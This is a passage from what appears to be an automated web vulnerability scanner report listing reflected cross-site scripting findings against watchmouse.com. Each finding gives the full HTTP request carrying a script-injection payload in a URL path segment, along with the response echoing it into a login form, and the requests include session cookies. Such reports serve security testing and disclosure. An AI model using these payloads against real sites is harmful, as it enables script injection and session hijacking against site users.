Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d407bed3fbd7f370bb6dfbda2b8a22c7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets1c1dc"><script>alert(1)</script>f828aa78b0b/css/screen.css?20101008" method="post">
...[SNIP]...

1.12. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abab"><script>alert(1)</script>fd7f8590f5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css2abab"><script>alert(1)</script>fd7f8590f5f/screen.css?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-76b7dcfeff53e3908ddb4cad637ddebe"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css2abab"><script>alert(1)</script>fd7f8590f5f/screen.css?20101008" method="post">
...[SNIP]...

1.13. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff752"><script>alert(1)</script>c6eccb65ad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/screen.cssff752"><script>alert(1)</script>c6eccb65ad2?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:58 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-4d42bcb1e9b2f0608911865297dbee1e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/screen.cssff752"><script>alert(1)</script>c6eccb65ad2?20101008" method="post">
...[SNIP]...

1.14. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/ui.smoothness.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a23b0"><script>alert(1)</script>cb2c7595e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsa23b0"><script>alert(1)</script>cb2c7595e94/css/ui.smoothness.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-129ebd42525ec76e8e3d18e1f3f5d298"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsa23b0"><script>alert(1)</script>cb2c7595e94/css/ui.smoothness.css" method="post">
...[SNIP]...

1.15. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/ui.smoothness.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 916c6"><script>alert(1)</script>e7f74e3f049 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css916c6"><script>alert(1)</script>e7f74e3f049/ui.smoothness.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a6a6d96e30d7ffd9fda6b414daac43ca"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css916c6"><script>alert(1)</script>e7f74e3f049/ui.smoothness.css" method="post">
...[SNIP]...

1.16. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/ui.smoothness.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d36"><script>alert(1)</script>5ea0dd8e008 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/ui.smoothness.css71d36"><script>alert(1)</script>5ea0dd8e008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-01aa739febfeab6d423052f50e4f9af0"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/ui.smoothness.css71d36"><script>alert(1)</script>5ea0dd8e008" method="post">
...[SNIP]...

1.17. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Product_Features.pdf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb49c"><script>alert(1)</script>a8ee1747e14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetscb49c"><script>alert(1)</script>a8ee1747e14/docs/WatchMouse_Product_Features.pdf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b204e0122919ba4cfffdd798cbeca3e3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetscb49c"><script>alert(1)</script>a8ee1747e14/docs/WatchMouse_Product_Features.pdf" method="post">
...[SNIP]...

1.18. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Product_Features.pdf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 417d0"><script>alert(1)</script>09f2126b4f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/docs417d0"><script>alert(1)</script>09f2126b4f5/WatchMouse_Product_Features.pdf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-92e2604f94e05e395fccd6ebdf443064"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/docs417d0"><script>alert(1)</script>09f2126b4f5/WatchMouse_Product_Features.pdf" method="post">
...[SNIP]...

1.19. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Product_Features.pdf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29527"><script>alert(1)</script>a4496893305 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/docs/WatchMouse_Product_Features.pdf29527"><script>alert(1)</script>a4496893305 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:25 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f3d52e0e407d258d9f0b84e14f53b859"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/docs/WatchMouse_Product_Features.pdf29527"><script>alert(1)</script>a4496893305" method="post">
...[SNIP]...

1.20. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Scripting_Howto.pdf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4bbb"><script>alert(1)</script>cb0b92e2eeb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsf4bbb"><script>alert(1)</script>cb0b92e2eeb/docs/WatchMouse_Scripting_Howto.pdf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2f151adf0c2cae404f426b6506106d8f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsf4bbb"><script>alert(1)</script>cb0b92e2eeb/docs/WatchMouse_Scripting_Howto.pdf" method="post">
...[SNIP]...

1.21. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Scripting_Howto.pdf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd0f5"><script>alert(1)</script>64740a47699 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/docsdd0f5"><script>alert(1)</script>64740a47699/WatchMouse_Scripting_Howto.pdf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-12d4e3809c6570acced19d100b12faba"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/docsdd0f5"><script>alert(1)</script>64740a47699/WatchMouse_Scripting_Howto.pdf" method="post">
...[SNIP]...

1.22. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Scripting_Howto.pdf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac803"><script>alert(1)</script>161de0cf20a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/docs/WatchMouse_Scripting_Howto.pdfac803"><script>alert(1)</script>161de0cf20a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:25 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-52a07aeac0146c340e8c75b1f55d3842"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/docs/WatchMouse_Scripting_Howto.pdfac803"><script>alert(1)</script>161de0cf20a" method="post">
...[SNIP]...

1.23. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645c0"><script>alert(1)</script>40b63ed072a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets645c0"><script>alert(1)</script>40b63ed072a/img/favicon.ico HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
